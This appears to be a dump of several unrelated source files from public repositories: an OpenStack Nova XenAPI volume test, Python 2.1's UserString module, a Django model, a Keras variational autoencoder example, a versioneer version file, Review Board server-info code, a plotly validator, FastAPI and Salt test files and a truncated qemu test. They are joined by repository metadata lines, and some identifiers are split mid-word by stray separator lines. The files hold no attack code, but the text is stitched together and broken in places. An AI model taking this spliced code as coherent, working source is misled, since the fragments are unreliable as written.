# Copyright (c) 2012 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from nova import test
from nova.tests.xenapi import stubs
from nova.virt.xenapi import volumeops
class VolumeAttachTestCase(test.TestCase):
def test_detach_volume_call(self):
registered_calls = []
def regcall(label):
def side_effect(*args, **kwargs):
registered_calls.append(label)
return side_effect
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(volumeops.vm_utils, 'lookup')
self.mox.StubOutWithMock(volumeops.vm_utils, 'find_vbd_by_number')
self.mox.StubOutWithMock(volumeops.vm_utils, 'is_vm_shutdown')
self.mox.StubOutWithMock(volumeops.vm_utils, 'unplug_vbd')
self.mox.StubOutWithMock(volumeops.vm_utils, 'destroy_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
self.mox.StubOutWithMock(volumeops.volume_utils, 'find_sr_from_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'purge_sr')
volumeops.vm_utils.lookup('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
volumeops.vm_utils.find_vbd_by_number(
'session', 'vmref', 'devnumber').AndReturn('vbdref')
volumeops.vm_utils.is_vm_shutdown('session', 'vmref').AndReturn(
False)
volumeops.vm_utils.unplug_vbd('session', 'vbdref')
volumeops.vm_utils.destroy_vbd('session', 'vbdref').WithSideEffects(
regcall('destroy_vbd'))
volumeops.volume_utils.find_sr_from_vbd(
'session', 'vbdref').WithSideEffects(
regcall('find_sr_from_vbd')).AndReturn('srref')
volumeops.volume_utils.purge_sr('session', 'srref')
self.mox.ReplayAll()
ops.detach_volume(
dict(driver_volume_type='iscsi', data='conn_data'),
'instance_1', 'mountpoint')
self.assertEquals(
['find_sr_from_vbd', 'destroy_vbd'], registered_calls)
def test_attach_volume_call(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=True).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint')
def test_attach_volume_no_hotplug(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=False).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint', hotplug=False)
def test_connect_volume_no_hotplug(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
instance_name = 'instance_1'
sr_uuid = '1'
sr_label = 'Disk-for:%s' % instance_name
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
vm_ref = 'vm_ref'
dev_number = 1
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.StubOutWithMock(volumeops.vm_utils, 'create_vbd')
volumeops.vm_utils.create_vbd(
session, vm_ref, vdi_ref, dev_number,
bootable=False, osvol=True).AndReturn(vbd_ref)
self.mox.ReplayAll()
ops._conn
|
ect_volume(connection_info, dev_number, instance_name,
vm_ref, hotplug=False)
self.assertEquals(False, called['VBD.plug'])
def test_connect_volume(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volume
|
ops.VolumeOps(session)
sr_uuid = '1'
sr_label = 'Disk-for:None'
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.ReplayAll()
ops.connect_volume(connection_info)
self.assertEquals(False, called['VBD.plug'])
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-2.1/Lib/UserString.py
|
Python
|
mit
| 7,530
| 0.00571
|
#!/usr/bin/env python
## vim:ts=4:et:nowrap
"""A user-defined wrapper around string objects
Note: string objects have grown methods in Python 1.6
This module requires Python 1.6 or later.
"""
from types import StringType, UnicodeType
import sys
__all__ = ["UserString","MutableString"]
class UserString:
def __init__(self, seq):
if isinstance(seq, StringType) or isinstance(seq, UnicodeType):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __long__(self): return long(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __contains__(self, char):
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(other + self.data)
else:
return self.__class__(str(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
self.data += other
else:
self.data += str(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width): return self.__class__(self.data.center(width))
def count(self, sub, start=0, end=sys.maxint):
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxint):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxint):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxint):
return self.data.index(sub, start, end)
|
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(sel
|
f): return self.data.isdigit()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width): return self.__class__(self.data.ljust(width))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self): return self.__class__(self.data.lstrip())
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxint):
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=sys.maxint):
return self.data.rindex(sub, start, end)
def rjust(self, width): return self.__class__(self.data.rjust(width))
def rstrip(self): return self.__class__(self.data.rstrip())
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxint):
return self.data.startswith(prefix, start, end)
def strip(self): return self.__class__(self.data.strip())
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
class MutableString(UserString):
"""mutable string objects
Python strings are immutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
    from UserString and then forget thereby to remove (override) the
    __hash__ method inherited from UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError, "unhashable type (it is mutable)"
def __setitem__(self, index, sub):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + sub + self.data[index+1:]
def __delitem__(self, index):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + self.data[index+1:]
def __setslice__(self, start, end, sub):
start = max(start, 0); end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start]+sub.data+self.data[end:]
elif isinstance(sub, StringType) or isinstance(sub, UnicodeType):
self.data = self.data[:start]+sub+self.data[end:]
else:
self.data = self.data[:start]+str(sub)+self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
if __name__ == "__main__":
# execute the regression test to stdout, if called as a script:
import os
called_in_dir, called_as = os.path.split(sys.argv[0])
called_in_dir = os.path.abspath(called_in_dir)
called_as, py = os.path.splitext(called_as)
sys.path.append(os.path.join(called_in_dir, 'test'))
if '-q' in sys.argv:
import test_support
test_support.verbose = 0
__import__('test_' + called_as.lower())
|
derrickyoo/serve-tucson
|
serve_tucson/locations/models.py
|
Python
|
bsd-3-clause
| 956
| 0
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
class Location(models.Model):
    address = models.CharField(max_length=255, blank=True)  # max_length is required; 255 is an assumed value
latitude = models.DecimalField(max_digits=10, decimal_places=6)
longitude = models.DecimalField(max_digits=10, decimal_places=6)
    created = models.DateTimeField(auto_now_add=True, editable=False)
    updated = models.DateTimeField(auto_now=True, editable=False)
owner = models.ForeignKey(User)
def get_absolute_url(self):
return reverse('location-detail', args=[str(s
|
elf.id)])
def __str__(self):
        return '{id: %d, latitude: %s, longitude: %s}' % (
self.id,
self.latitude,
self.longitude
)
class Meta:
app_label = 'location
|
s'
get_latest_by = 'updated'
ordering = ['updated']
verbose_name = 'location'
verbose_name_plural = 'Locations'
|
baojianzhou/DLReadingGroup
|
keras/examples/variational_autoencoder_deconv.py
|
Python
|
apache-2.0
| 7,159
| 0.000698
|
'''This script demonstrates how to build a variational autoencoder
with Keras and deconvolution layers.
Reference: "Auto-Encoding Variational Bayes" https://arxiv.org/abs/1312.6114
'''
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras.datasets import mnist
# input image dimensions
img_rows, img_cols, img_chns = 28, 28, 1
# number of convolutional filters to use
filters = 64
# convolution kernel size
num_conv = 3
batch_size = 100
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
latent_dim = 2
intermediate_dim = 128
epsilon_std = 1.0
epochs = 5
x = Input(batch_shape=(batch_size,) + original_img_size)
conv_1 = Conv2D(img_chns,
kernel_size=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(filters,
kernel_size=(2, 2),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_2)
conv_4 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(batch_size, latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
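# Note: this is the reparameterization trick -- z is drawn as
# z_mean + sigma * epsilon, so the sampling step stays differentiable
# with respect to z_mean and z_log_var.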
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(filters * 14 * 14, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 14, 14)
else:
output_shape = (batch_size, 14, 14, filters)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(filters,
kernel_size=num_conv,
padding='same',
strides=1,
activation='relu')
decoder_deconv_2 = Conv2DTranspose(filters, num_conv,
padding='same',
strides=1,
activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 29, 29)
else:
output_shape = (batch_size, 29, 29, filters)
decoder_deconv_3_upsamp = Conv2DTranspose(filters,
kernel_size=(3, 3),
strides=(2, 2),
padding='valid',
activation='relu')
decoder_mean_squash = Conv2D(img_chns,
kernel_size=2,
padding='valid',
activation='sigmoid')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
|
vae.compil
|
e(optimizer='rmsprop', loss=None)
vae.summary()
# train the VAE on MNIST digits
(x_train, _), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_train = x_train.reshape((x_train.shape[0],) + original_img_size)
x_test = x_test.astype('float32') / 255.
x_test = x_test.reshape((x_test.shape[0],) + original_img_size)
print('x_train.shape:', x_train.shape)
vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, x_test))
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
|
wheeler-microfluidics/dmf_control_board_plugin
|
_version.py
|
Python
|
bsd-3-clause
| 18,441
| 0
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# d
|
irectories (produced by setup.py build) will contain a much shorte
|
r file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.17 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty"
|
KnowNo/reviewboard
|
reviewboard/webapi/server_info.py
|
Python
|
mit
| 3,158
| 0
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from reviewboard import get_version_string, get_package_version, is_release
from reviewboard.admin.server import get_server_url
_registered_capabilities = {}
_capabilities_defaults = {
'diffs': {
'base_commit_ids': True,
'moved_files': True,
'validation': {
'base_commit_ids': True,
}
},
'review_requests': {
'commit_ids': True,
},
'scmtools': {
'git': {
'empty_files': True,
},
'mercurial': {
'empty_files': True,
},
'perforce': {
'moved_files': True,
'empty_files': True,
},
'svn': {
'empty_files': True,
},
},
'text': {
'markdown': True,
'per_field_text_types': True,
'can_include_raw_values': True,
},
}
def get_server_info(request=None):
"""Returns server information for use in the API.
This is used for the root resource and for the deprecated server
info resource.
"""
capabilities = _capabilities_defaults.copy()
capabilities.update(_registered_capabilities)
return {
'product': {
'name': 'Review Board',
'version': get_version_string(),
'package_version': get_package_version(),
'is_release': is_release(),
},
'site': {
'url': get_server_url(request=request),
'administrators': [
{
'name': name,
'email': email,
}
for name, email in settings.ADMINS
],
'time_zone': settings.TIME_ZONE,
},
'capabilities': capabilities
}
def register_webapi_capabilities(capabilities_id, caps):
"""Registers a set of web API capabilities.
These capabilities will appear in the dictionary of available
capabilities with the ID as their key.
    A capabilities_id attribute must be passed in, and can only be registered once.
A KeyError will be thrown if attempting to register a second time.
"""
if not capabilities_id:
raise ValueError('The capabilities_id attribute must not be None')
if capabilities_id in _registered_capabilities:
raise KeyError('"%s" is already a registered set of capabilities'
% capabilities_id)
if capabilities_id in _capabilities_defaults:
raise KeyError('"%s" is reserved for the default set of capabilities'
% capabilities_id)
_registered_capabilities[capabilities_id] = caps
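# Example (hypothetical capability set, for illustration only):
#     register_webapi_capabilities('my_extension', {'batch_review': True})
# makes {'my_extension': {'batch_review': True}} appear under the
# 'capabilities' key returned by get_server_info().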
def unregister_webapi_capabilities(capabilities_id):
"""Unregisters a previously re
|
gistered set of web API capabilities."""
try:
del _registered_capabilities[capabilities_id]
except KeyError:
logging.error('Failed to unregister unknown web API capabilities '
'"%s".',
capabilities_id)
|
raise KeyError('"%s" is not a registered web API capabilities set'
% capabilities_id)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/scatter3d/error_z/_valueminus.py
|
Python
|
mit
| 512
| 0.001953
|
import _plotly_utils.basevalidators
class ValueminusValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="valueminus", parent_
|
name="scatter3d.error_z", **kwar
|
gs
):
super(ValueminusValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "info"),
**kwargs
)
|
rmk135/objects
|
tests/unit/wiring/test_wiringfastapi_py36.py
|
Python
|
bsd-3-clause
| 1,426
| 0.004208
|
from httpx import AsyncClient
# Runtime import to avoid syntax errors in samples on Python < 3.5 and reach top-dir
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
_SAMPLES_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../samples/',
)),
)
import sys
sys.path.append(_T
|
OP_DIR)
sys.path.append(_SAMPLES_DIR)
from asyncutils import AsyncTestCase
from wiringfastapi import web
class WiringFastAPITest(AsyncTestCase):
client: AsyncClient
def setUp(self) -> None:
super().setUp()
self.client = AsyncClient(app=web.app, base_url='http://test')
def tearDown(self) -> None:
self._run(self.client.aclose())
super
|
().tearDown()
def test_depends_marker_injection(self):
class ServiceMock:
async def process(self):
return 'Foo'
with web.container.service.override(ServiceMock()):
response = self._run(self.client.get('/'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'result': 'Foo'})
def test_depends_injection(self):
response = self._run(self.client.get('/auth', auth=('john_smith', 'secret')))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'username': 'john_smith', 'password': 'secret'})
|
saltstack/salt
|
templates/test_state/tests/unit/states/test_{{module_name}}.py
|
Python
|
apache-2.0
| 590
| 0.015254
|
'''
:codeauthor: {{full_name}} <{{email}}>
'''
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import patch
import salt.states.{{module_name}} as {{module_name}}
|
class {{module_name|capital
|
ize}}TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {% raw -%} {
{% endraw -%} {{module_name}} {%- raw -%}: {
'__env__': 'base'
}
} {%- endraw %}
def test_behaviour(self):
# Test inherent behaviours
pass
|
ehabkost/tp-qemu
|
qemu/tests/zero_copy.py
|
Python
|
gpl-2.0
| 2,659
| 0
|
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import env_process, utils_test
@error.context_aware
def run(test, params, env):
"""
Vhost zero copy test
1) Enable/Disable vhost_net zero copy in host
    2) Boot the main vm.
3)
|
Run the ping test, check guest nic works.
    4) Check the vm is alive and has no crash
:param test: QEMU test object.
